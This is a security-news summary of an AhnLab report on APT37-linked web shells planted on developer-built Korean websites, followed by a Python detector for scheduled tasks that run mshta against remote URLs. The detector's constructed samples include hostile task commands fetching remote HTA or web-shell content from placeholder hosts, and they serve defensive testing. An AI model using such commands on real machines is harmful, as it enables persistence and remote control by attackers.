Damages to Multiple Korean Websites Created by a Certain Website Development Company
2023-06-19 • AhnLab
AhnLab reports that websites built by a Korean web-development company were compromised and abused both to distribute malware and to receive data stolen from infected hosts, with web shells planted on the sites acting as the collection and control endpoint. The affected sites belonged to organizations in the manufacturing, trade, electrical, electronics, education, construction, medical, and travel sectors. On infected hosts the malware persisted through a Windows Task Scheduler task and used mshta to connect to web-shell URLs hosted on already-compromised legitimate websites, so the remote-control traffic went to legitimate domains and was harder for victims to recognize. AhnLab links the targeting to RedEyes/APT37 activity and assesses that externally accessible admin pages on the developer-built sites may have enabled the malware upload.
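The persistence pattern described above (a scheduled task that runs mshta against a remote URL) is cheap to hunt for on a host. The following is an added example, not code from AhnLab or the report: it parses Task Scheduler task definitions in their XML form (the files under System32\Tasks, or the output of `schtasks /query /tn <name> /xml`) and flags any Exec action whose command line invokes mshta with an http(s) URL, including the form where mshta is launched through `cmd.exe /c`. The task definitions embedded in it are constructed samples; the host names, paths and task names are placeholders, not indicators from the report.

```python
r"""Flag Windows scheduled tasks whose action launches mshta.exe with a remote URL.

Added example, not code from the AhnLab report: it parses Task Scheduler task
definitions in their XML form (the files under System32\Tasks, or the output of
`schtasks /query /tn <name> /xml`) and reports tasks matching the persistence
pattern described above: a scheduled task running mshta.exe against an http(s)
URL. The sample task definitions below are constructed for illustration; the
host names and paths in them are placeholders, not indicators from the report.
"""
import os
import re
import xml.etree.ElementTree as ET

# Namespace used by every Task Scheduler task definition.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def task_actions(xml_data):
    """Yield (command, arguments) for every <Exec> action in one task XML."""
    root = ET.fromstring(xml_data)
    for exec_node in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (exec_node.findtext("t:Command", default="", namespaces=NS) or "").strip()
        args = (exec_node.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        yield cmd, args


def is_mshta_remote(cmd, args):
    """True when the action runs mshta and hands it an http(s) URL.

    Looks at the whole command line, so it also catches mshta launched via
    cmd.exe /c, which a check on <Command> alone would miss.
    """
    line = f"{cmd} {args}"
    return "mshta" in line.lower() and URL_RE.search(line) is not None


def suspicious_tasks(tasks):
    """tasks: {task name: task XML (str or bytes)} -> [(name, command line, url)]."""
    hits = []
    for name, xml_data in tasks.items():
        for cmd, args in task_actions(xml_data):
            line = f"{cmd} {args}".strip()
            if is_mshta_remote(cmd, args):
                hits.append((name, line, URL_RE.search(line).group(0)))
    return hits


def load_tasks_from_dir(tasks_dir):
    """Collect task XML from a Task Scheduler folder such as System32\\Tasks.

    Task files there are stored as UTF-16 XML; passing the raw bytes to
    ElementTree lets it honour the byte-order mark. Non-XML files are skipped.
    """
    tasks = {}
    for dirpath, _, files in os.walk(tasks_dir):
        for fn in files:
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                data = fh.read()
            try:
                ET.fromstring(data)
            except ET.ParseError:
                continue
            tasks[os.path.relpath(path, tasks_dir)] = data
    return tasks


def _task_xml(command, arguments):
    """Build a minimal task definition (constructed sample, not a real task)."""
    return (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        "<Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>"
        '<Actions Context="Author"><Exec>'
        f"<Command>{command}</Command><Arguments>{arguments}</Arguments>"
        "</Exec></Actions></Task>"
    )


# Constructed samples: one benign task, two forms of the mshta pattern, and a
# local-file mshta task that should not be flagged. Hosts are placeholders.
SAMPLE_TASKS = {
    r"Maintenance\DiskCleanup": _task_xml(r"C:\Windows\System32\cleanmgr.exe", "/autoclean"),
    r"Updater\OfficeUpdate": _task_xml(
        r"C:\Windows\System32\mshta.exe",
        "http://compromised-site.example/uploads/shell.php?cmd=task"),
    r"Updater\SyncTask": _task_xml(
        "cmd.exe", "/c mshta https://another-site.example/img/logo.hta"),
    r"Local\Helper": _task_xml(r"C:\Windows\System32\mshta.exe", r"C:\Tools\helper.hta"),
}

if __name__ == "__main__":
    import sys
    # Pass a Tasks folder (or an exported copy of one) to scan it; otherwise
    # the constructed samples are scanned.
    tasks = load_tasks_from_dir(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_TASKS
    for name, line, url in suspicious_tasks(tasks):
        print(f"[!] {name}: {line}  (remote: {url})")
```

Run against the samples it reports the two remote-mshta tasks and ignores both the benign cleanup task and the mshta task that opens a local .hta. The match is deliberately on the whole command line rather than on the Command element, because an attacker can wrap mshta in cmd.exe or rename the URL argument; a rule that only inspects Command would miss the second sample. Hits on a real host still need triage: confirm the task's author and creation time, and treat a URL on an otherwise legitimate third-party site as the web-shell pattern the report describes rather than as a benign updater.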